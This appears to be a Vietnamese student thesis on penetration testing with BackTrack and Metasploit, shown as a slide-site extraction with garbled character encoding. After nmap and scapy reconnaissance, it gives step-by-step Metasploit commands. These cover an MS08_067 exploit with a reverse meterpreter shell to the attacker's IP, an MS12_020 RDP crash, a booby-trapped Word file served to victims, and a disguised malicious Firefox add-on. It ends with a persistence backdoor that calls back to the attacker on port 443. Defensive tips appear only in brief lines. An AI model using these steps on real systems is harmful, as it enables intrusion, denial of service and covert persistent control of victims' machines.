  • 10. Äá» tài: Nghiên cứu và sá»­ dụng BackTrack để kiểm tra an ninh mạng GVHD: Võ Äá»— Thắng Trang | 2 SVTH: Nguyá»…n Văn Tiến Äặt tên và chá»n nÆ¡i lÆ°u máy ảo. Sau đó chúng ta hoàn thành các tùy chá»n của máy ảo, tiếp theo chúng ta sẽ mở máy ảo lên. Chá»n chế Ä‘á»™ boot “text mode†và đăng nhập vào Backtrack vá»›i username :root và password là toor. Gõ “startx†để vào giao diện đồ há»a .Sau đó chúng ta nhấn vào Install trên màn hình để cài đặt.
  • 11. Äá» tài: Nghiên cứu và sá»­ dụng BackTrack để kiểm tra an ninh mạng GVHD: Võ Äá»— Thắng Trang | 3 SVTH: Nguyá»…n Văn Tiến Sauk hi Ä‘iá»n các thông tin vá» ngôn ngữ, múi giá», bàn phím, phân vùng ổ cứng thì sau đó ta bấm vào nút install để cài đặt Giao diện của BackTrack sau khi cài đặt hoàn thành trên VMWare
  • 12. Äá» tài: Nghiên cứu và sá»­ dụng BackTrack để kiểm tra an ninh mạng GVHD: Võ Äá»— Thắng Trang | 4 SVTH: Nguyá»…n Văn Tiến ChÆ°Æ¡ng 1: THU THẬP THÔNG TIN VÀ KHAI THÃC Lá»– HỎNG CỦA HỆ ÄIỀU HÀNH WINDOWS TRONG MẠNG LAN I. Giá»›i thiệu Äầu tiên hacker tiến hành thu thập thông tin vá» hạ tầng của mục tiêu, mô hình của các Web Server, kiểu giao tiếp thông tin thông qua các cổng (port) nào, những site liên quan đến việc thá»±c hiện chức năng của site mục tiêu... Việc thu thập thông tin là vấn Ä‘á» quan trá»ng cho việc tấn công vào má»™t hệ thống máy mục tiêu. Cho dù hacker tấn công theo phÆ°Æ¡ng diện phần cứng hay qua ứng dụng thì việc thu thập vẫn là cần thiết. FootPrinting (In dấu ấn - thu thập thông tin): Là bÆ°á»›c mà kẻ tấn công thâu tóm càng nhiá»u thông tin càng tốt vỠđối tượng, ngÆ°á»i dùng, doanh nghiệp, các chi nhánh của công ty, máy chủ… bao gồm các chi tiết: Domain Name, Äịa chỉ IP, Networking Prototcols…Äây là má»™t bÆ°á»›c quan trá»ng: Cho hacker nhiá»u thông tin, đôi khi vá»›i những thông tin này hacker đã có thể làm chủ hệ thống. Sá»­ dụng công cụ Nslookup, SmartWhois… Sanning (Quét thăm dò mạng): là quá trình tìm hiểu thông tin vá» các live host trên mạng để giúp hacker quyết định kiểu tấn công nào vào hệ thống. Trong quá trình Scanning hacker sẽ tìm hiểu thông tin vá»: địa chỉ IP, cổng, hệ Ä‘iá»u hành, network, … Enumeration (Äiểm danh mạng - liệt kê tìm lá»— hổng): Äến đây, các hacker bắt đầu kiểm soát server sÆ¡ bá»™. BÆ°á»›c này là quá trình tập hợp và phân tích tên ngÆ°á»i dùng, tên máy,tài nguyên chia sẽ và các dịch vụ. Sau đó tìm kiếm những tài nguyên được bảo vệ kém, hoặc tài khoản ngÆ°á»i dùng mà có thể sá»­ dụng để xâm nhập, bao gồm các mật khẩu mặc định, các script và dịch vụ mặc định.
  • 13. Äá» tài: Nghiên cứu và sá»­ dụng BackTrack để kiểm tra an ninh mạng GVHD: Võ Äá»— Thắng Trang | 5 SVTH: Nguyá»…n Văn Tiến II. Thu thập thông tin 1. Liệt kê dịch vụ Là tiến trình thu thập thông tin từ mạng, cho phép thu thập thông tin vá» tổ chức nhÆ° tên ngÆ°á»i dùng, tên máy tính, địa chỉ IP, mail server… 2. Xác định phạm vi mạng Xác định phạm vi các địa chỉ IP từ mạng của mục tiêu Sá»­ dụng Dmitry để lấy thông tin từ mục tiêu, sá»­ dụng –wnsp để tra cứu lấy tên miá»n và quét cổng.
  • 14. Äá» tài: Nghiên cứu và sá»­ dụng BackTrack để kiểm tra an ninh mạng GVHD: Võ Äá»— Thắng Trang | 6 SVTH: Nguyá»…n Văn Tiến Sá»­ dụng “scapy†để xác định traceroute. Scapy : mở scapy res,unans=traceroute(["www.athena.edu.vn"],dport=[80,443],maxttl=20): xác định Ä‘Æ°á»ng Ä‘i của gói tin đến Athena.edu.vn vá»›i port là 80 và 443, maxttl là 20. res.graph() :hiển thị Ä‘Æ°á»ng Ä‘i gói tin 3. Xác định host có Ä‘ang mở hay không Chúng ta có thể sá»­ dụng lệnh ping đến mục tiêu. Nmap –sP [ip đích] : -sP giúp xâm nhập mạng mục tiêu nhanh chóng, giúp cho chúng ta biết host đó có up hay không. Tùy chá»n sP sẽ gá»­i gói tin ICMP echo request và 1 gói tin TCP ACK tá»›i cổng 80. 4. Các dịch vụ Äể xem các dịch vụ nào Ä‘ang mở trên đối tượng ta sá»­ dụng Nmap [địa chỉ ip đích] Hay Nmap –p 1-1000 [địa chỉ ip đích] tìm port từ 1 đến 1000 có port nào Ä‘ang mở hay không. Chúng ta cÅ©ng có thể scan 1 port nào đó nmap –p 80 [địa chỉ ip] 5. Xác Ä‘inh hệ Ä‘iá»u hành Chúng ta đã biết được địa chỉ IP , máy hoạt Ä‘á»™ng, xác định được các cổng mở của mục tiêu, bÆ°á»›c tiếp theo là chúng ta xác định hệ Ä‘iá»u hành nào Ä‘ang chạy để cung
  • 15. Äá» tài: Nghiên cứu và sá»­ dụng BackTrack để kiểm tra an ninh mạng GVHD: Võ Äá»— Thắng Trang | 7 SVTH: Nguyá»…n Văn Tiến cấp cho quá trình khac thác lá»— hổng. Nmap –O [địa chỉ IP] 6. Nhận diện các dịch vụ Xác định các dịch vụ dá»±a trên các cổng đã nhận diện 7. Äánh giá các mối Ä‘e dá»a Backtrack sá»­ dụng công cụ Metalgo, cung cấp thông tin tổng hợp từ bên trong lẫn bên ngoài để có thông tin rõ ràng vá» mối de doa.
  • 16. Äá» tài: Nghiên cứu và sá»­ dụng BackTrack để kiểm tra an ninh mạng GVHD: Võ Äá»— Thắng Trang | 8 SVTH: Nguyá»…n Văn Tiến III. Khai thác lá»— há»ng qua mạng Lan Äặc Ä‘iểm chung của má»™t hệ thống mạng là có nhiá»u ngÆ°á»i sá»­ dụng chung và phân tán vá» mặt địa lý nên việc bảo vệ tài nguyên (mất mát hoặc sá»­ dụng không hợp lệ) phức tạp hÆ¡n nhiá»u so vá»›i việc môi trÆ°á»ng má»™t máy tính Ä‘Æ¡n lẻ, hoặc má»™t ngÆ°á»i sá»­ dụng. Hoạt Ä‘á»™ng của ngÆ°á»i quản trị hệ thống mạng phải đảm bảo các thông tin trên mạng là tin cậy và sá»­ dụng đúng mục đích, đối tượng đồng thá»i đảm bảo mạng hoạt Ä‘á»™ng ổn định không bị tấn công bởi những kẻ phá hoại. NhÆ°ng trên thá»±c tế là không má»™t mạng nào đảm bảo là an toàn tuyệt đối, má»™t hệ thống dù được bảo vệ chắc chắn đến mức nào thì cÅ©ng có lúc bị vô hiệu hóa bởi những kẻ có ý đồ xấu. 1. Khai thác lá»— há»ng MS08_067 Khai thác trá»±c tiếp lên dịch vụ, đây là dịch vụ chia sẽ file trên Windows được mở mặc định(port 445), attacker có thể làm tràn bá»™ đệm và thá»±c thi má»™t mã lệnh từ xa. Các hê Ä‘iá»u hành bị ảnh hưởng : Windows 2000 sp4, Windows 2000 SP4, XP
  • 17. Äá» tài: Nghiên cứu và sá»­ dụng BackTrack để kiểm tra an ninh mạng GVHD: Võ Äá»— Thắng Trang | 9 SVTH: Nguyá»…n Văn Tiến SP2 và SP3, Server 2003 SP1 và SP2, Vista SP1… Các bÆ°á»›c thá»±c hiện khai thác: Chúng ta mở msfconsole lên. Tiếp theo là chúng ta gõ: use exploit/windows/smb/ms08_067_netapi Chúng ta show options để sem các tùy chá»n của nó. Tiếp đó chúng ta set RHOST (địa chỉ IP của máy nạn nhân) .
  • 18. Äá» tài: Nghiên cứu và sá»­ dụng BackTrack để kiểm tra an ninh mạng GVHD: Võ Äá»— Thắng Trang | 10 SVTH: Nguyá»…n Văn Tiến Chúng ta set payload windows/meterpreter/reverse_rtcp Chúng ta set LHOST (địa chỉ IP của attacker). Và show targets để xem các tuy chá»n.
  • 19. Äá» tài: Nghiên cứu và sá»­ dụng BackTrack để kiểm tra an ninh mạng GVHD: Võ Äá»— Thắng Trang | 11 SVTH: Nguyá»…n Văn Tiến Chúng ta khai thác máy nạn nhân là winxp Sp3 nên tùy chá»n là 5. Và cuối cung là exploit để khai thác. Và bây giá» chúng ya có thể xâm nhập vào máy win XP. Cách phong tránh là tắt các cổng không sá»­ dụng. Cập nhật các bản vá. Cài các phần má»m có mua bản quyá»n. 2. Khai thác lá»— há»ng MS12_020 Do gá»­i các gói tin RDP đến đối tượng đích được khởi tạo không đúng cách hoặc bị xóa, gây ra tình trạng máy tính bị lá»—i màn hình xanh và khởi Ä‘á»™ng lại. Các hệ Ä‘iá»u hành bị ảnh hưởng: Windows XP SP2 and SP3, Windows Server
  • 20. Äá» tài: Nghiên cứu và sá»­ dụng BackTrack để kiểm tra an ninh mạng GVHD: Võ Äá»— Thắng Trang | 12 SVTH: Nguyá»…n Văn Tiến 2003 SP2, Windows Vista SP2, Windows Server 2008 … Quá trình thá»±c hiện: Sá»­ dụng lệnh: use auxiliary/dos/windows/rdp/ms12_020_maxchanelids Tiếp theo ta gõ: “show options†để xem các tùy chá»n Chúng ta gõ: “set RHOST [địa chỉ IP máy nạn nhân]†Cuối cùn là “run†để thÆ°c hiện. Chúng ta sẽ qua máy Win XP và thấy màn hình xanh
  • 21. Äá» tài: Nghiên cứu và sá»­ dụng BackTrack để kiểm tra an ninh mạng GVHD: Võ Äá»— Thắng Trang | 13 SVTH: Nguyá»…n Văn Tiến Bên máy attacker thì báo hệ thống đã bị đánh sập. Cách phòng tránh là: cập nhật bản vá lá»—i, tắt port 3389, cài chÆ°Æ¡ng trình diệt virus… 3. Khai thác lá»— há»ng MS12_027 Lá»—i do định dạng file trên office. Các phần má»m bị ảnh hưởng :Office 2003 SP3, Office 2007 SP2, Office 2007 SP3, Office 2010 SP1... Quá trình thá»±c hiện: sá»­ dụng Backtrack 5r3 làm attacker và 1 máy Win XP SP2 có cài Office 2007 làm victim. Trên Metasploit console chúng ta gõ lệnh : “use exploit/windows/fileformat/ms12_027_mscomctl_bofâ€
  • 22. Äá» tài: Nghiên cứu và sá»­ dụng BackTrack để kiểm tra an ninh mạng GVHD: Võ Äá»— Thắng Trang | 14 SVTH: Nguyá»…n Văn Tiến Äặt tên của file word tùy ý vá»›i phần mở rá»™ng â€.doc†Tiếp theo là “set payload windows/meterpreter/reverse_tcp†Äịa chỉ IP của attacker: “set LHOST [IP máy attack] và tiếp theo là exploit để tao ra fileword có chứa mã Ä‘á»™c. Dùng lệnh cp để chuyển file này ra Desktop cho dá»… dang sá»­ dụng. Ta copy file word đã được tạo vào Ä‘Æ°á»ng dẫn /var/www/
  • 23. Äá» tài: Nghiên cứu và sá»­ dụng BackTrack để kiểm tra an ninh mạng GVHD: Võ Äá»— Thắng Trang | 15 SVTH: Nguyá»…n Văn Tiến Chúng ta start dich vụ web lên. Tiếp theo chúng ta tạo ra 1 lắng nge: “ use exploit/multi/handler†Và “ set payload windows/meterpreter/reverse_tcp†“set LHOST [IP của attacker]†Máy nạn nhân truy cập vào Ä‘Æ°á»ng dẫn chứa file word và tải file đó vá» Sauk hi tai vá» thì mở file đó lên
  • 24. Äá» tài: Nghiên cứu và sá»­ dụng BackTrack để kiểm tra an ninh mạng GVHD: Võ Äá»— Thắng Trang | 16 SVTH: Nguyá»…n Văn Tiến Chúng ta thấy trên máy attack có 1 sessions được tạo ra. Attacker kết nối vào và thá»±c hiên tấn công.
  • 25. Äá» tài: Nghiên cứu và sá»­ dụng BackTrack để kiểm tra an ninh mạng GVHD: Võ Äá»— Thắng Trang | 17 SVTH: Nguyá»…n Văn Tiến ChÆ°Æ¡ng 2: XÂY Dá»°NG HONEYPOT ÄỂ XÂM NHẬP QUA MẠNG INTERNET I. Giá»›i thiệu vá» Honeypot Honeypot là má»™t hệ thống tài nguyên thông tin được xây dá»±ng vá»›i mục đích giả dạng đánh lừa những kẻ sá»­ dụng và xâm nhập không hợp pháp, thu hút sá»± chú ý của chúng, ngăn không cho chúng tiếp xúc vá»›i hệ thống thật. Hệ thống tài nguyên thông tin có nghÄ©a là Honeypot có thể giả dạng bất cứ loại máy chủ tài nguyên nào nhÆ° là Mail Server, Domain Name Server, Web Server… Honeypot sẽ trá»±c tiếp tÆ°Æ¡ng tác vá»›i tin tặc và tìm cách khai thác thông tin vá» tin tặc nhÆ° hình thức tấn công, công cụ tấn công hay cách thức tiến hành thay vì bị tấn công. Vá»›i mục tiêu xây dá»±ng Honeypot để xâm nhập vào lá»— hổng hệ thống máy tính qua Internet, Hacker có thể sá»­ dụng Máy chủ ảo (VPS) và cài đặt Metasploit để trở thành Honeypot và giả dạng là má»™t Web server bình thÆ°á»ng, từ đó đánh lừa máy nạn nhân khi má»™t máy tính bất kỳ có kết nối Internet truy cập vào địa chỉ mà hacker cung cấp. II. Xâm nhập qua mạng internet bằng Honeypot 1. Cài đặt Metasploit trên VPS Quá trình cài đặt Metasploit trên máy VPS: ở đây tôi sá»­ dụng phiên bản Metasploit 4.6.1. Yêu cầu đầu tiên là tắt các chÆ°Æ¡ng trình diệt virus và tÆ°á»ng lá»­a. Giao diện Welcome chúng ta chon “Nextâ€
  • 26. Äá» tài: Nghiên cứu và sá»­ dụng BackTrack để kiểm tra an ninh mạng GVHD: Võ Äá»— Thắng Trang | 18 SVTH: Nguyá»…n Văn Tiến License Agreement chá»n “ I accept the agreement†chá»n “Next†Tạo ra 1 thÆ° mục metasploit trên ổ C:, chá»n Next
  • 27. Äá» tài: Nghiên cứu và sá»­ dụng BackTrack để kiểm tra an ninh mạng GVHD: Võ Äá»— Thắng Trang | 19 SVTH: Nguyá»…n Văn Tiến Ở đây Metasploit sá»­ SSL port là 3790 Tạo ra 1 Webserver vá»›i server name “localhost†và ngày hết hạn 3650, chúng ta cÅ©ng có thể thay đổi ngày hết hạn của nó. Quá trình cài đặt Ä‘ang diá»…n ra
  • 28. Äá» tài: Nghiên cứu và sá»­ dụng BackTrack để kiểm tra an ninh mạng GVHD: Võ Äá»— Thắng Trang | 20 SVTH: Nguyá»…n Văn Tiến Quá trình cài đặt đã hoàn tất.
  • 29. Äá» tài: Nghiên cứu và sá»­ dụng BackTrack để kiểm tra an ninh mạng GVHD: Võ Äá»— Thắng Trang | 21 SVTH: Nguyá»…n Văn Tiến 2. Khai thác qua mạng internet Dá»±a vào những lá»—i trên trình duyệt ngÆ°á»i tấn công sá»­ dụng phÆ°Æ¡ng pháp nào đó làm cho các nạn nhân truy cập vào Ä‘Æ°á»ng dẫn có chứa mã Ä‘á»™c hay thá»±c thi các mã Ä‘á»™c đó. Tôi thÆ°c hiện khai thác lá»— há»ng qua trình duyệt firefox dá»±a trên lá»—i add on của firefox: ta sá»­ dụng máy WinXP có cài firefox(tất cả các phiên bản Ä‘iá»u được) và VPS đã được cài Metasploit (Honeypot): Trên VPS chúng ta mở msfconsole : “use exploit/multi/browser/firefox_xpi_bootstrapped_addonâ€
  • 30. Äá» tài: Nghiên cứu và sá»­ dụng BackTrack để kiểm tra an ninh mạng GVHD: Võ Äá»— Thắng Trang | 22 SVTH: Nguyá»…n Văn Tiến Tiếp theo là chúng ta đặt tên cho addon để nạn nhân tưởng đây là addon của firefox : “set addonname [tên addon]. ÄÆ°á»ng dẫn chứa file addon đó “set uripath /†và sá»­ dụng exploit để bắt đầu lắng nge. Sau khi exploit thì nó tạo ra 1 Ä‘Æ°á»ng dẫn. Nếu nạn nhân sá»­ dụng firefox truy cập vào Ä‘Æ°á»ng dẫn này và cài add on thì sẽ có 1 kết nối đến Honeypot. Có 1 sesions đã được mở.
  • 31. Äá» tài: Nghiên cứu và sá»­ dụng BackTrack để kiểm tra an ninh mạng GVHD: Võ Äá»— Thắng Trang | 23 SVTH: Nguyá»…n Văn Tiến “Sessions –i 1†để kết nối đến máy nạn nhân. Và chúng ta đã chiếm được hệ thống của nạn nhân. 3. Backdoor Backdoor là má»™t chÆ°Æ¡ng trình được hacker cài vào máy tính nạn nhân có thể truy cập vào thá»i gian sau cho dù lần xâm nhập trÆ°á»›c đó đã bị phát hiện. Cách thá»±c hiện: Tạo thêm má»™t dịch vụ má»›i có tên “rất hệ thốngâ€, gỡ bá» má»™t dịch vụ ít sá»­ dụng và cài backdoor vá»›i chính tên đó. Sauk hi chúng ta chiếm được quyá»n hệ thống và muốn lần sau máy nạn nhân sẽ tá»± kết nối đến mà không phải tốn thá»i gian khai tấn công nhÆ° thế nữa. Chúng ta sá»­ dụng backdoor có sẳn trên Metasploit là persistence. Xem các trợ giúp của backdoor persistence bằng lệnh: “run persistence –hâ€
  • 32. Äá» tài: Nghiên cứu và sá»­ dụng BackTrack để kiểm tra an ninh mạng GVHD: Võ Äá»— Thắng Trang | 24 SVTH: Nguyá»…n Văn Tiến Tiếp theo ta thá»±c hiện : “run persistence –A –U -1 10 –p 443 –r [ip của attacker] Và ta thấy có thêm 1 sessions đã được tạo ra. Ta thoát khá»i sessions. Khi má»—i lần nạn nhân mở máy lên thì sẽ có 1 sesions má»›i được tạo ra.
  • 33. Äá» tài: Nghiên cứu và sá»­ dụng BackTrack để kiểm tra an ninh mạng GVHD: Võ Äá»— Thắng Trang | 25 SVTH: Nguyá»…n Văn Tiến Bây giá» ta có thể khai thác trên máy nạn nhân.
AboutCopyright
© 2025 ºÝºÝߣ